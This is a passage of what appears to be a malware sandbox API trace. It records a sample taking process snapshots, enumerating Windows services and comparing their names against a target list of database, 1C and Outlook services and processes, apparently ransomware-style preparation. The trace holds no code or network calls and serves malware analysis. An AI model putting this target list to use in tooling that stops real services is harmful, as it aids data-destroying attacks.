th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.371] lstrlenW (lpString="svchost.exe") returned 11 [0052.371] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0052.371] CloseHandle (hObject=0x194) returned 1 [0052.371] Sleep (dwMilliseconds=0x1f4) [0053.116] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232e50 [0053.117] EnumServicesStatusExW (in: hSCManager=0x4232e50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0053.117] GetLastError () returned 0xea [0053.117] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0053.118] EnumServicesStatusExW (in: hSCManager=0x4232e50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0053.118] CloseServiceHandle (hSCObject=0x4232e50) returned 1 [0053.119] lstrlenW (lpString="Appinfo") returned 7 [0053.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0053.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0053.119] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0053.119] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0053.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0053.119] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0053.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.119] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0053.119] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0053.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0053.119] lstrlenW (lpString="AudioSrv") returned 8 [0053.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0053.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0053.119] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0053.119] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0053.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0053.119] lstrlenW (lpString="BFE") returned 3 [0053.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0053.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0053.119] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0053.119] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0053.119] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0053.119] lstrlenW (lpString="CryptSvc") returned 8 [0053.119] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0053.119] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0053.120] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0053.134] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0053.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0053.134] lstrlenW (lpString="CscService") returned 10 [0053.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0053.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0053.134] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0053.134] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0053.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0053.134] lstrlenW (lpString="DcomLaunch") returned 10 [0053.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.134] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0053.134] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0053.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0053.135] lstrlenW (lpString="Dhcp") returned 4 [0053.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0053.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0053.135] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0053.135] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0053.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0053.135] lstrlenW (lpString="Dnscache") returned 8 [0053.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0053.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0053.135] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0053.135] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0053.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0053.135] lstrlenW (lpString="DPS") returned 3 [0053.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0053.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0053.135] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0053.135] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0053.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0053.138] lstrlenW (lpString="eventlog") returned 8 [0053.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0053.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0053.138] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0053.138] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0053.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0053.138] lstrlenW (lpString="EventSystem") returned 11 [0053.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0053.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0053.138] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0053.138] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0053.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0053.138] lstrlenW (lpString="gpsvc") returned 5 [0053.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0053.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0053.139] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0053.139] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0053.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0053.139] lstrlenW (lpString="iphlpsvc") returned 8 [0053.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.139] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0053.139] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0053.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0053.139] lstrlenW (lpString="LanmanServer") returned 12 [0053.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0053.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0053.139] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0053.139] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0053.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0053.139] lstrlenW (lpString="LanmanWorkstation") returned 17 [0053.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.139] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0053.139] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0053.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0053.139] lstrlenW (lpString="lmhosts") returned 7 [0053.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0053.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0053.139] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0053.139] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0053.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0053.139] lstrlenW (lpString="MMCSS") returned 5 [0053.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0053.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0053.140] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0053.140] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0053.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0053.140] lstrlenW (lpString="MpsSvc") returned 6 [0053.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0053.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0053.140] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0053.140] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0053.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0053.140] lstrlenW (lpString="Netman") returned 6 [0053.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0053.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0053.140] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0053.140] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0053.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0053.140] lstrlenW (lpString="netprofm") returned 8 [0053.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0053.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0053.140] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0053.140] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0053.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0053.140] lstrlenW (lpString="NlaSvc") returned 6 [0053.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0053.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0053.140] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0053.140] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0053.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0053.140] lstrlenW (lpString="nsi") returned 3 [0053.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0053.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0053.141] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0053.141] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0053.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0053.141] lstrlenW (lpString="PcaSvc") returned 6 [0053.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0053.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0053.141] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0053.141] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0053.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0053.141] lstrlenW (lpString="PlugPlay") returned 8 [0053.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0053.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0053.141] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0053.141] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0053.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0053.141] lstrlenW (lpString="Power") returned 5 [0053.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0053.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0053.141] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0053.141] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0053.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0053.141] lstrlenW (lpString="ProfSvc") returned 7 [0053.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0053.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0053.141] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0053.141] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0053.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0053.141] lstrlenW (lpString="RpcEptMapper") returned 12 [0053.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.142] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0053.142] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0053.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0053.142] lstrlenW (lpString="RpcSs") returned 5 [0053.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0053.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0053.142] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0053.142] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0053.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0053.142] lstrlenW (lpString="SamSs") returned 5 [0053.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0053.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0053.142] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0053.142] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0053.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0053.142] lstrlenW (lpString="Schedule") returned 8 [0053.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0053.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0053.142] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0053.142] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0053.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0053.142] lstrlenW (lpString="SENS") returned 4 [0053.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0053.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0053.142] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0053.142] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0053.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0053.142] lstrlenW (lpString="ShellHWDetection") returned 16 [0053.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.143] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0053.143] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0053.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0053.143] lstrlenW (lpString="Spooler") returned 7 [0053.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0053.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0053.143] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0053.143] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0053.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0053.143] lstrlenW (lpString="swprv") returned 5 [0053.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0053.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0053.143] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0053.143] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0053.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0053.143] lstrlenW (lpString="SysMain") returned 7 [0053.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0053.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0053.143] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0053.143] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0053.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0053.143] lstrlenW (lpString="Themes") returned 6 [0053.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0053.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0053.143] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0053.143] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0053.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0053.143] lstrlenW (lpString="TrkWks") returned 6 [0053.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0053.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0053.144] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0053.144] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0053.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0053.144] lstrlenW (lpString="UxSms") returned 5 [0053.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0053.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0053.144] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0053.144] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0053.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0053.144] lstrlenW (lpString="VSS") returned 3 [0053.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0053.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0053.144] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0053.144] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0053.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0053.144] lstrlenW (lpString="WdiServiceHost") returned 14 [0053.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.144] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0053.144] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0053.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0053.144] lstrlenW (lpString="WdiSystemHost") returned 13 [0053.144] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.144] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.144] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0053.144] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0053.144] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0053.144] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0053.145] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.145] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0053.145] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0053.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0053.145] lstrlenW (lpString="Winmgmt") returned 7 [0053.145] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0053.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0053.145] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0053.145] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0053.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0053.145] lstrlenW (lpString="WPDBusEnum") returned 10 [0053.145] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.145] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.145] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0053.145] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0053.145] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0053.145] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0053.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c [0053.152] Process32FirstW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.153] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.154] lstrlenW (lpString="System") returned 6 [0053.154] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0053.154] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0053.154] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0053.154] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0053.154] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0053.154] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0053.154] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0053.154] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.155] lstrlenW (lpString="smss.exe") returned 8 [0053.155] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0053.155] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0053.155] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0053.155] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0053.155] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0053.155] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0053.155] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0053.155] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.156] lstrlenW (lpString="csrss.exe") returned 9 [0053.156] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0053.156] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0053.156] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0053.156] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0053.156] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0053.156] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0053.156] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0053.156] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.157] lstrlenW (lpString="wininit.exe") returned 11 [0053.157] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0053.157] lstrcmpiW 